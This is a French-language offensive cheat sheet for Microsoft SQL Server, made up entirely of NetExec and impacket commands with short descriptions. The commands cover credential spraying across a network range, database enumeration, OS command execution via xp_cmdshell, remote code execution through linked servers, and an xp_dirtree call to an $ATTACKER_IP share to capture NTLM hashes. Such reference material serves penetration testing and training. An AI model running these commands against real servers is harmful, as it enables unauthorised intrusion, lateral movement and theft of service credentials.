nxc mssql $CIDR -u $USER -p $PASSDescription: Scanner le réseau pour trouver les instances MSSQL accessibles avec les creds courants.
Exploitation
Enumérer les instances, exécuter des commandes via xp_cmdshell et pivoter via linked servers.
nxc mssql $CIDR -u $USER -p $PASSDescription: Scanner le réseau pour trouver les instances MSSQL accessibles avec les creds courants.
nxc mssql $TARGET -u $USER -p $PASS -q 'SELECT name FROM master..sysdatabases'Description: Lister les bases de données disponibles sur l'instance MSSQL.
nxc mssql $TARGET -u $USER -p $PASS -q 'SELECT IS_SRVROLEMEMBER("sysadmin")'Description: Vérifier si l'utilisateur courant est sysadmin : accès complet à l'instance si oui.
mssqlclient.py $DOMAIN/$USER:$PASS@$TARGET -windows-authDescription: Connexion interactive impacket : idéal pour explorer et exécuter des commandes manuellement.
nxc mssql $TARGET -u $USER -p $PASS -x 'whoami'Description: Exécuter une commande OS via xp_cmdshell : nécessite sysadmin ou droits délégués.
nxc mssql $TARGET -u $USER -p $PASS --local-auth -x 'whoami'Description: Même chose avec auth locale : utile si les creds AD ne marchent pas directement.
mssqlclient.py $DOMAIN/$USER:$PASS@$TARGET -windows-auth -execute 'EXEC xp_cmdshell "whoami"'Description: Activer et utiliser xp_cmdshell via impacket pour RCE sur le serveur MSSQL.
nxc mssql $TARGET -u $USER -p $PASS -q 'EXEC master..xp_dirtree "\\$ATTACKER_IP\share"'Description: Forcer une connexion SMB vers l'attaquant pour capturer le hash NTLM du service MSSQL.
mssqlclient.py $DOMAIN/$USER:$PASS@$TARGET -windows-auth -execute 'SELECT * FROM sys.servers'Description: Lister les linked servers : potentiel de pivot vers d'autres instances MSSQL.
mssqlclient.py $DOMAIN/$USER:$PASS@$TARGET -windows-auth -execute 'EXEC (''EXEC xp_cmdshell ''''whoami'''''' '') AT [$LINKED_SERVER]'Description: RCE via linked server : exécution sur une autre instance depuis la première.